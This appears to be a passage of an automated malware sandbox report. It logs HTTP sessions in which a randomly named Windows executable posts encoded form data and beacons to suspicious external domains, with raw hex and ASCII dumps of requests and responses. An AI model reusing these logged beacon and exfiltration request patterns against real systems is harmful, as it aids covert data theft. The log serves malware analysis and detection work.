                                                                                          Data Raw: 38 7a 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 36 54 56 33 49 63 55 61 38 59 47 4a 57 32 35 34 57 7a 63 73 44 6f 4c 45 42 72 38 7a 79 57 67 68 2b 48 51 34 2b 68 70 62 49 65 4d 62 5a 6e 4f 68 72 75 73 41 56 6f 48 79 67 76 75 4e 63 61 6f 62 31 6c 4b 36 6b 79 57 54 6a 6a 75 6d 2f 56 79 62 62 76 4a 48 42 69 77 43 67 4d 64 56 76 6d 48 4a 41 51 53 31 50 57 55 43 33 35 69 59 4f 5a 2b 49 33 66 55 6d 4a 2f 33 62 65 71 44 39 72 75 38 70 43 63 59 2b 4c 44 75 59 57 6c 68 6b 49 72 48 4d 2b 65 49 47 33 71 73 70 65 44 51 59 59 55 4e 67 42 49 74 54 4e 48 4d 5a 41 6e 32 6d 61 5a 4d 69 35 66 6f 35 6f 74 4b 77 32 6a 71 45 64 63 58 4e 51 34 6b 5a 53 4e 73 65 58 48 6b 68 30 64 6b 59 4a 4a 4c 6e 39 58 4f 52 6b 57 73 51 66 48 39 38 49 58 54 6c 35 6c 57 46 66 47 30 50 63 36 68 5a 37 76 52 6f 35 37 44 38 67 45 58 54 62 57 67 33 53 43 2f 33 69 68 39 50 47 74 4f 74 34 63 45 36 77 79 34 41 66 38 4e 63 5a 2b 4c 49 6a 6b 79 46 4d 56 69 47 74 [TRUNCATED]
                                                                                          Data Ascii: 8z=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5T6TV3IcUa8YGJW254WzcsDoLEBr8zyWgh+HQ4+hpbIeMbZnOhrusAVoHygvuNcaob1lK6kyWTjjum/VybbvJHBiwCgMdVvmHJAQS1PWUC35iYOZ+I3fUmJ/3beqD9ru8pCcY+LDuYWlhkIrHM+eIG3qspeDQYYUNgBItTNHMZAn2maZMi5fo5otKw2jqEdcXNQ4kZSNseXHkh0dkYJJLn9XORkWsQfH98IXTl5lWFfG0Pc6hZ7vRo57D8gEXTbWg3SC/3ih9PGtOt4cE6wy4Af8NcZ+LIjkyFMViGtMi2J/OXj1P8H2Mxb2B0k5oa/NCndA2qo/4w/MsVeyr7gwriLC7GHtFH5qj713FXm3azTAIXDdXBm+I3Q1hOex2CZhwV06V2CgKpSFwx6cTNVHAdSwRehTww6FxSzHt91THfwEdb72aXa/0aGMUSGtRpIQrIh9etInHqRufRFCZjIyLDmLz7EWvJzOFV/6dt7rGS5YoV3Cg+EcJdgx7wdLH1Kj9w3cJ9OJwwqtrm+4ur7+4qw6hqdo+npDOmdRIIoD5XxIr3E5y2+5Bcwg+3Q6PihirrsBtQmIyeMxHhNAiWvhLXx2ioaZOG6YMsPRznxQGYV4CTH+o6lWYQY5EoV8W8MUSn7TmMpbl7AKvYw4eKomUN9OnLuC2OgkSy0AxBrJJy9cv0HpR94dj8qqymzQBDTS62YmZJGCxrBDYX5Iy+b5HmpyadMDg/Aq/xwq8eIN2Dd/qNYqlmGi12oCU0vkWjYP2/nTCxqMdoFP7v34Ks+kFdEIUVsQVtWnUVN8/7YRpCLCUSIYATYwrhhnA5hbzwDDxBRIizl9L8M/IPB/DiPTjBuREHw8YJOG6pxw6agYtInZ6RVJRkTjCS1HGRzPVn28YmrKmvYblTf64lNlPlFSXaYQ7J0HF9xnhlgimieyI1lZkHbTQQl3Rj0s9L7+v6FfxjLf2V4qM [TRUNCATED]
                                                                                          Nov 24, 2024 08:22:22.387420893 CET309INHTTP/1.1 403 Forbidden
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:17 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 166
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          36192.168.2.550012147.255.21.187802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:23.793912888 CET470OUTGET /u9hy/?8z=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxHJx7JVXWinhAO2sI58h2p8ITVN90H2WFsxLS9qnZGEsuzw==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:25.055861950 CET141INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:19 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 0
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          37192.168.2.550013172.67.159.61802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:30.356466055 CET738OUTPOST /f8c6/ HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.zriaraem-skiry.sbs
                                                                                          Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 53 68 41 4b 37 5a 4c 36 56 38 62 38 34 30 75 6c 79 36 67 57 52 57 6f 64 79 65 71 54 4c 43 6a 31 44 74 63 7a 70 75 45 51 68 37 72 46 6e 62 7a 54 45 4c 65 4c 66 74 50 37 54 67 41 48 56 47 2b 64 67 55 71 39 4c 42 6d 6d 34 68 44 75 34 76 30 6a 67 72 6a 5a 52 4e 2f 2f 46 46 47 48 55 74 35 46 33 38 6f 44 38 77 35 52 62 48 79 4b 55 7a 45 59 46 6c 39 6f 45 2f 49 2b 72 44 34 70 32 54 4e 6d 5a 74 6f 5a 6a 32 31 53 55 54 45 61 59 78 48 62 73 59 77 50 39 6d 4c 32 56 52 35 44 31 44 78 4c 79 2b 57 44 6c 2f 6b 44 45 54 4c 64 79 41 68 58 31 35 77 73 6f 69 55 4e 4f 64 6b 3d
                                                                                          Data Ascii: 8z=nbjRd4jDDoGnShAK7ZL6V8b840uly6gWRWodyeqTLCj1DtczpuEQh7rFnbzTELeLftP7TgAHVG+dgUq9LBmm4hDu4v0jgrjZRN//FFGHUt5F38oD8w5RbHyKUzEYFl9oE/I+rD4p2TNmZtoZj21SUTEaYxHbsYwP9mL2VR5D1DxLy+WDl/kDETLdyAhX15wsoiUNOdk=
                                                                                          Nov 24, 2024 08:22:31.632987022 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:31 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt%2FC5g%2BuGtiOfW3NoAmUKTGD%2FGXnYmr8EN7hAqypXDHX2JqtePdyuaDrMkj0V1nMONioeE1h176%2B0V5B87UWTyRS5IpHWtDJwrxN3SWYcumNbHF8f0syOch4g776B30TS%2Fqnv7PJFsti"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a5f97cfe421b-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f d3 30 10 7e df af 38 82 40 20 2d 75 d3 6e 8c 26 69 a4 d1 6e 62 d2 80 89 15 c1 1e bd e4 1a 7b 24 76 b0 af 69 c3 c4 7f 47 4e b2 b6 13 b0 27 9c 17 fb ee bb ef bb 73 ee 1c 3f 9b 7f 9a 2d 6e ae ce 40 50 59 c0 d5 97 77 97 17 33 f0 7c c6 be 8e 67 8c cd 17 73 f8 f6 7e f1 e1 12 82 c1 10 ae c9 c8 94 18 3b fb e8 81 27 88 aa 90 b1 f5 7a 3d 58 8f 07 da e4 6c f1 99 6d 1c 4b e0 c2 fa ad 6f db 98 41 46 99 97 1c c4 ad c8 a6 2c 94 9d fe 85 20 98 4c 26 5d 9c e7 40 61 c1 55 3e f5 50 79 b0 dd 25 b1 40 9e 25 07 00 00 31 49 2a 30 39 1a 1e c1 cb 32 e3 56 44 f0 51 13 9c eb 95 ca 62 d6 39 3b 60 89 c4 c1 e9 f9 f8 63 25 eb a9 37 d3 8a 50 91 bf 68 2a f4 20 ed 4e 53 8f 70 43 cc e9 47 90 0a 6e 2c d2 f4 cb e2 dc 7f eb b1 7d 22 c5 4b 9c 7a 19 da d4 c8 8a a4 56 7b 0c d7 da 98 e6 10 2a 9e 23 28 4d b0 74 c9 6c c3 2d 35 05 02 35 15 f6 5a a9 b5 5e e7 73 eb 56 67 0d dc 2f b5 22 df ca 9f 18 06 47 d5 26 82 54 17 da 84 cf 4f da 15 41 eb 5e f2 52 16 4d c8 8d e4 45 04 8e ca e7 85 cc 55 [TRUNCATED]
                                                                                          Data Ascii: 2d0TQo0~8@ -un&inb{$viGN's?-n@PYw3|gs~;'z=XlmKoAF, L&]@aU>Py%@%1I*092VDQb9;`c%7Ph* NSpCGn,}"KzV{*#(Mtl-55Z^sVg/"G&TOA^RMEU"4-1QN&'Rp260t>;<<
                                                                                          Nov 24, 2024 08:22:31.633028030 CET344INData Raw: 7d 12 3b 11 18 b5 22 ad 61 8d 32 17 14 c2 ad 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 3e c8 fb e3 56 7e 3c a9 36 7b fa 15 dc af 65 46 22 1c 77 b4 7f 16 db 13 f8 05 2e 29 e4 2b d2 51 6f 30 ad 76 6b 79 c0 90 ae 42 18 bb 3a 77 0a 99 ac ff 8b
                                                                                          Data Ascii: };"a2.$BR!>V~<6{eF"w.)+Qo0vkyB:wTw6>:9}I5 b[rnhba}/VIA\n'QqSr5HudwObVa"p3<Fz@nJ52T9<iFZR<m-$l


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          38192.168.2.550014172.67.159.61802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:33.022430897 CET758OUTPOST /f8c6/ HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.zriaraem-skiry.sbs
                                                                                          Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 58 31 47 34 67 7a 6d 50 45 51 78 72 72 46 6f 4c 7a 53 4b 72 65 4d 66 74 53 4d 54 6c 41 48 56 48 61 64 67 51 36 39 4c 51 6e 55 37 52 44 73 33 50 30 68 2f 37 6a 5a 52 4e 2f 2f 46 46 43 74 55 74 68 46 33 4d 34 44 7a 78 35 53 52 6e 79 4a 64 54 45 59 55 31 39 6b 45 2f 4a 64 72 42 4d 54 32 58 39 6d 5a 76 67 5a 6a 69 70 64 50 6a 45 6d 57 52 47 69 39 59 35 33 37 31 37 47 53 77 49 6c 71 41 4a 4f 36 6f 6e 70 2f 64 73 72 58 7a 6e 6c 69 54 70 67 6b 4a 52 46 79 42 45 39 51 4b 77 66 58 48 30 42 61 79 78 77 59 51 43 2f 67 68 35 78 5a 4d 4d 59
                                                                                          Data Ascii: 8z=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQX1G4gzmPEQxrrFoLzSKreMftSMTlAHVHadgQ69LQnU7RDs3P0h/7jZRN//FFCtUthF3M4Dzx5SRnyJdTEYU19kE/JdrBMT2X9mZvgZjipdPjEmWRGi9Y53717GSwIlqAJO6onp/dsrXznliTpgkJRFyBE9QKwfXH0BayxwYQC/gh5xZMMY
                                                                                          Nov 24, 2024 08:22:34.379933119 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:34 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV5gaq%2BEQPf97UTDiHs%2BuWvJLQOCFCfTSHiB%2FLGkH4BIIaNZFpdoABY8yZ7XRd28BZw33w3gKfJUk3k9fa7tJKC1eC8nEYniMgi7fiV0b%2FaWZKVn5S98ueYX%2F63wMvyhBlxQLAyMvmfg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a60a9a7fde98-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1423&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f d3 30 10 7e df af 38 82 40 20 2d 75 d3 6e 8c 26 69 a4 d1 6e 62 d2 80 89 15 c1 1e bd e4 1a 7b 24 76 b0 af 69 c3 c4 7f 47 4e b2 b6 13 b0 27 9c 17 fb ee bb ef bb 73 ee 1c 3f 9b 7f 9a 2d 6e ae ce 40 50 59 c0 d5 97 77 97 17 33 f0 7c c6 be 8e 67 8c cd 17 73 f8 f6 7e f1 e1 12 82 c1 10 ae c9 c8 94 18 3b fb e8 81 27 88 aa 90 b1 f5 7a 3d 58 8f 07 da e4 6c f1 99 6d 1c 4b e0 c2 fa ad 6f db 98 41 46 99 97 1c c4 ad c8 a6 2c 94 9d fe 85 20 98 4c 26 5d 9c e7 40 61 c1 55 3e f5 50 79 b0 dd 25 b1 40 9e 25 07 00 00 31 49 2a 30 39 1a 1e c1 cb 32 e3 56 44 f0 51 13 9c eb 95 ca 62 d6 39 3b 60 89 c4 c1 e9 f9 f8 63 25 eb a9 37 d3 8a 50 91 bf 68 2a f4 20 ed 4e 53 8f 70 43 cc e9 47 90 0a 6e 2c d2 f4 cb e2 dc 7f eb b1 7d 22 c5 4b 9c 7a 19 da d4 c8 8a a4 56 7b 0c d7 da 98 e6 10 2a 9e 23 28 4d b0 74 c9 6c c3 2d 35 05 02 35 15 f6 5a a9 b5 5e e7 73 eb 56 67 0d dc 2f b5 22 df ca 9f 18 06 47 d5 26 82 54 17 da 84 cf 4f da 15 41 eb 5e f2 52 16 4d c8 8d e4 45 04 8e ca e7 85 cc 55 [TRUNCATED]
                                                                                          Data Ascii: 2c5TQo0~8@ -un&inb{$viGN's?-n@PYw3|gs~;'z=XlmKoAF, L&]@aU>Py%@%1I*092VDQb9;`c%7Ph* NSpCGn,}"KzV{*#(Mtl-55Z^sVg/"G&TOA^RMEU"4-1QN&'Rp260t>;<<}
                                                                                          Nov 24, 2024 08:22:34.379996061 CET326INData Raw: 3b 11 18 b5 22 ad 61 8d 32 17 14 c2 ad 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 3e c8 fb e3 56 7e 3c a9 36 7b fa 15 dc af 65 46 22 1c 77 b4 7f 16 db 13 f8 05 2e 29 e4 2b d2 51 6f 30 ad 76 6b 79 c0 90 ae 42 18 bb 3a 77 0a 99 ac ff 8b c6 8e
                                                                                          Data Ascii: ;"a2.$BR!>V~<6{eF"w.)+Qo0vkyB:wTw6>:9}I5 b[rnhba}/VIA\n'QqSr5HudwObVa"p3<Fz@nJ52T9<iFZR<m-$l+
                                                                                          Nov 24, 2024 08:22:34.380616903 CET21INData Raw: 62 0d 0a e3 02 00 c7 19 4c e3 7d 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: bL}0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          39192.168.2.550015172.67.159.61802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:35.696445942 CET1775OUTPOST /f8c6/ HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.zriaraem-skiry.sbs
                                                                                          Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 50 31 61 65 30 7a 6e 73 73 51 79 72 72 46 75 37 7a 58 4b 72 66 4a 66 74 4b 49 54 6c 45 58 56 46 53 64 6d 43 79 39 66 79 50 55 73 42 44 73 31 50 30 73 67 72 69 54 52 4a 6a 42 46 46 53 74 55 74 68 46 33 50 51 44 33 67 35 53 65 48 79 4b 55 7a 45 63 46 6c 39 49 45 38 34 6d 72 42 59 44 32 6b 31 6d 5a 50 77 5a 68 58 31 64 44 6a 45 67 56 52 47 54 39 59 6c 6f 37 31 6d 35 53 77 4e 43 71 41 78 4f 35 2f 4b 77 67 39 38 74 4e 68 44 33 6d 52 52 63 32 4a 56 6f 7a 58 45 4d 4e 4e 59 77 62 56 6f 42 4e 43 78 42 54 69 4c 73 38 30 42 64 55 34 64 54 58 48 59 56 67 34 44 4d 52 65 51 4a 4a 31 6a 74 67 62 4e 30 78 73 53 2b 35 7a 44 79 6f 7a 7a 46 49 65 6e 72 62 48 45 2f 66 77 6a 39 71 6f 4b 76 34 43 44 4c 68 48 69 4f 30 42 48 76 73 51 58 75 77 6d 75 2b 61 6d 67 76 53 58 63 50 4e 47 72 67 4c 65 49 2b 4a 6b 30 63 49 77 38 43 48 49 57 4d 74 49 42 4f 44 61 50 37 46 76 6a 76 43 51 42 64 6c 67 51 [TRUNCATED]
                                                                                          Data Ascii: 8z=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQP1ae0znssQyrrFu7zXKrfJftKITlEXVFSdmCy9fyPUsBDs1P0sgriTRJjBFFStUthF3PQD3g5SeHyKUzEcFl9IE84mrBYD2k1mZPwZhX1dDjEgVRGT9Ylo71m5SwNCqAxO5/Kwg98tNhD3mRRc2JVozXEMNNYwbVoBNCxBTiLs80BdU4dTXHYVg4DMReQJJ1jtgbN0xsS+5zDyozzFIenrbHE/fwj9qoKv4CDLhHiO0BHvsQXuwmu+amgvSXcPNGrgLeI+Jk0cIw8CHIWMtIBODaP7FvjvCQBdlgQi0/4Kp1Xv2B3C366F7lGfSxIT9kjjDpIGkeVQREgGc14QMt9YccIcTJKZfxE/O21dCrjzPjUDFx/QdNO8/7BASxdxRtXtOOlXtFSj5Gr4vB/2ddwluoY63OEc0Bw8/JRC0OqwYklv3PC1omEQsCD8dnACiah6nkFioSoSDkaCJ23LjA8ZGabWvwai/mmIj5Tiwj+mx0C55v/jEfSub6XOeL4E6bcZeD5W1HSP5ABbiE5BrL7CroZRB+FzxFIhDrX2pwVwcp1HmVM3W7DvqVO6kd0MQthVUml54p9stPeZzNnwXDB8mDXQG4nO2NnYb6AXLPyzjzgaiowVxpVZwTaUXg9s38eyzhFRGhK2lppY92fDTlLBsbimDBFIsNofXOxgL/cRM6GrvEel2aww3JMTZrMnM6CuPXTwPrMGLmVFL0kNxTJI5Ph2EV8cx2hIneV/HAOIbRprKa2balw/krZ7rKD7mBidUt3lc2eb9JoMNtgPPsjeqEFxEDPC6eMstwkG7z79AUrzBCv3WhJWOK8NFtYEu+LD00F4tpIEATp715mMJKjji4WAk+6eG3s21PrBiNKXR9xvqWVuhDkI7luuNyDtCYA8lMbaFMMWl4/YOYptpFG2a0X9PB+mIFuxj7akRWyCPnItSe4V/YJVLLSo6GpUcm6PYEgff [TRUNCATED]
                                                                                          Nov 24, 2024 08:22:37.059489965 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRvagLVKRbBUBB3xsgc3XdVg%2BtRzWfjkVXdCfefBuTCXNPaaSybvddwehSm1BQ4HmzvL4qL%2FW%2Bnbc3PBS2l%2BRX0EBN9f0Uf%2BQpfAvvZLKVqg7MAulquslSCEvJWoYNEIif0l2egXTA6f"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a61b4fe1c35f-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1489&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1775&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f d3 30 10 7e df af 38 82 40 20 2d 75 d3 6e 8c 26 69 a4 d1 6e 62 d2 80 89 15 c1 1e bd e4 1a 7b 24 76 b0 af 69 c3 c4 7f 47 4e b2 b6 13 b0 27 9c 17 fb ee bb ef bb 73 ee 1c 3f 9b 7f 9a 2d 6e ae ce 40 50 59 c0 d5 97 77 97 17 33 f0 7c c6 be 8e 67 8c cd 17 73 f8 f6 7e f1 e1 12 82 c1 10 ae c9 c8 94 18 3b fb e8 81 27 88 aa 90 b1 f5 7a 3d 58 8f 07 da e4 6c f1 99 6d 1c 4b e0 c2 fa ad 6f db 98 41 46 99 97 1c c4 ad c8 a6 2c 94 9d fe 85 20 98 4c 26 5d 9c e7 40 61 c1 55 3e f5 50 79 b0 dd 25 b1 40 9e 25 07 00 00 31 49 2a 30 39 1a 1e c1 cb 32 e3 56 44 f0 51 13 9c eb 95 ca 62 d6 39 3b 60 89 c4 c1 e9 f9 f8 63 25 eb a9 37 d3 8a 50 91 bf 68 2a f4 20 ed 4e 53 8f 70 43 cc e9 47 90 0a 6e 2c d2 f4 cb e2 dc 7f eb b1 7d 22 c5 4b 9c 7a 19 da d4 c8 8a a4 56 7b 0c d7 da 98 e6 10 2a 9e 23 28 4d b0 74 c9 6c c3 2d 35 05 02 35 15 f6 5a a9 b5 5e e7 73 eb 56 67 0d dc 2f b5 22 df ca 9f 18 06 47 d5 26 82 54 17 da 84 cf 4f da 15 41 eb 5e f2 52 16 4d c8 8d e4 45 04 8e ca e7 85 cc 55 [TRUNCATED]
                                                                                          Data Ascii: 2c5TQo0~8@ -un&inb{$viGN's?-n@PYw3|gs~;'z=XlmKoAF, L&]@aU>Py%@%1I*092VDQb9;`c%7Ph* NSpCGn,}"KzV{*#(Mtl-55Z^sVg/"G&TOA^RMEU"4-1QN&'Rp260t>;<<}
                                                                                          Nov 24, 2024 08:22:37.059573889 CET348INData Raw: 12 3b 11 18 b5 22 ad 61 8d 32 17 14 c2 ad 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 3e c8 fb e3 56 7e 3c a9 36 7b fa 15 dc af 65 46 22 1c 77 b4 7f 16 db 13 f8 05 2e 29 e4 2b d2 51 6f 30 ad 76 6b 79 c0 90 ae 42 18 bb 3a 77 0a 99 ac ff 8b c6
                                                                                          Data Ascii: ;"a2.$BR!>V~<6{eF"w.)+Qo0vkyB:wTw6>:9}I5 b[rnhba}/VIA\n'QqSr5HudwObVa"p3<Fz@nJ52T9<iFZR<m-$l


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          40192.168.2.550016172.67.159.61802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:38.354875088 CET478OUTGET /f8c6/?afwXa=6nnHQlkprRILE&8z=qZLxeIvUMpnHejM96/T0f6H04zmKlOMWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgjSD2yKENm9C4V9rKFkDKUP4Cqcdi4mEHWGKUWB9ccnENVw== HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:39.734849930 CET1236INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:39 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xuEpzTEQwiEr9pCWHOAt6GEHC9QJ3PfNEfQcCKUogiXO3by%2B0Ue1yGs%2BPFKOdKGAEfed9Tnr%2FfKX0aRpUsVL4ZHtBVwgB9IJcxhAISxFprFs7WwPa79wrIEECpP3U2bFPmH4N%2B1P71N4"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
